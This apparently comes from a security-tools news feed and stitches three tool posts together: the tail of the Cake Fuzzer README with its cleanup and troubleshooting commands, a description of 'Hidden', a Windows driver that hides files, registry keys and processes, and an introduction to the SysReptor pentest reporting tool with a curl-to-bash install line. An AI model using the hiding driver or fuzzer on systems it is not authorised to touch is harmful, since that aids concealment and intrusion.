    sudo chown -R www-data:www-data /var/www/MISP/app/tmp/logs/

    Once your scan finishes revert the instrumentation:

    python cake_fuzzer.py instrument revert

    To Run Again

    To run cake fuzzer again, do the following:

    Delete Applications Logs (as an example to this, MISP logs stored /var/www/MISP/app/tmp/logs)

    rm  /var/www/MISP/app/tmp/logs/*

    Delete All Files Inside of /cake_fuzzer/databases folder

    rm  /cake_fuzzer/databases/*

    Delete cake_fuzzer/results.jsonfile (Firstly do not forget to save or examine previous scan resulst)

    rm  /cake_fuzzer/results.json

    Finally follow previous running proccess again with 3 terminals

    FAQ / Troubleshooting

    Attack Queue seems like doing nothing

    Attack queue marks executed attacks in the database as 'executed' so to run whole suite again you need to remove the database and add attacks again.

    Make sure to kill monitors and attack queues before removing the database.

    rm database.db*
    python cake_fuzzer.py run fuzzer
    python cake_fuzzer.py run attack_queue

    Target app does not save logs to log files

    This is likely due to the fact that the previous log files were overwritten by root. Cake Fuzzer operates as root so new log files will be created with the root as the owner. Remove them:

    chmod -R a+w /var/www/MISP/app/tmp/logs/*

    No files in /cake_fuzzer dir of a VM after a reboot

    If you use VM with sharing cake fuzzer with your host machine, make sure that the host directory is properly attached to the guest VM:

    sudo vmhgfs-fuse .host:/cake_fuzzer /cake_fuzzer -o allow_other -o uid=1000

    Target app crashes after running Cake Fuzzer

    Cake Fuzzer has to be located under the root directory of the machine and the base directory name should be cake_fuzzer specificaly.

    mv CakeFuzzer/ /cake_fuzzer

    "Patch" errors while runing instrument apply

    Instrumentation proccess is a part of Cake Fuzzer execution flow. When you run instrument apply followed by instrument check, both of these commands should result in the same number of changes.

    If you get any "patch" error you could apply patches manually and delete problematic patch file. Patches are located under the /cake_fuzzer/cakefuzzer/instrumentation/pathces directory.

    Dependency errors

    While installing or running if you have python dependency error, manuallay install dependencies after switching to virtual environment.

    First switch to the virtual environment

    source venv/bin/activate

    After that you can install dependecies with pip3.

    pip3 install -r requriments.txt

    Credits

    Inspiration

    This project was inspired by:

    Commision

    This project was commissioned by: Cake Fuzzer is a project that is meant to help automatically and continuously discover vulnerabilities in web applications created based on specific frameworks with very limited false positives. (2)

    Initial contributors



    Hidden - Windows Driver With Usermode Interface Which Can Hide Processes, File-System And Registry Objects, Protect Processes And Etc

    By: Zion3R

     


    Hidden has been developed like a solution for reverse engineering and researching tasks. This is a windows driver with a usermode interface which is used for hiding specific environment on your windows machine, like installed RCE programs (ex. procmon, wireshark), vm infrastructure (ex. vmware tools) and etc.


    Features

    • hide registry keys and values
    • hide files and directories
    • hide processes (experimental, might be not stable)
    • protect specific processes
    • exclude specific processes from hiding and protection features
    • usermode interface (lib and cli) for working with a driver

    and so on

    System requirements

    Windows Vista and above, x86 and x64

    Recommended build environment

    • Visual Studio 2019
    • Windows Driver Kit 10

    Building

    Following guide explains how to make a release win32 build

    1. Open Hidden.sln using Visual Studio
    2. Build Hidden Package project with configurations Release, Win32
    3. Open build results folder <ProjectDir>\Release

    Installing

    1. Disable a digital signature enforcement on a test machine (bcdedit /set TESTSIGNING ON) and reboot it
    2. Copy files from <ProjectDir>\Release\Hidden Package to a test machine
    3. Right mouse click on Hidden.inf and choose Install
    4. Start a driver (sc start hidden)
    5. Make sure service is running (sc query hidden)

    Important: Keep in mind that the driver bitness have to be the same to an OS bitness

    Hiding

    A command line tool hiddencli is used for managing a driver. You are able to use it for hiding and unhiding objects, changing a driver state and so on.

    To hide a file try the command

    hiddencli /hide file c:\Windows\System32\calc.exe

    Want to hide a directory? No problems

    hiddencli /hide dir "c:\Program Files\VMWare"

    Registry key?

    hiddencli /hide regkey "HKCU\Software\VMware, Inc."

    Maybe a process?

    hiddencli /hide pid 2340

    By a process image name?

    hiddencli /hide image apply:forall c:\Windows\Explorer.EXE

    To get a full help just type

    hiddencli /help


    Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

    By: Zion3R


    Easy and customisable pentest report creator based on simple web technologies.

    SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!


    Your Benefits

    Write in markdown
    Design in HTML/VueJS
    Render your report to PDF
    Fully customizable
    Self-hosted or Cloud
    No need for Word

    SysReptor Cloud

    You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:

    Sign up here


    SysReptor Self-Hosted

    You prefer self-hosting? That's fine! You will need:

    • Ubuntu
    • Latest Docker (with docker-compose-plugin)

    You can then install SysReptor with via script:

    curl -s https://docs.sysreptor.com/install.sh | bash

    After successful installation, access your application at http://localhost:8000/.

    Get detailed installation instructions at Installation.





    ❌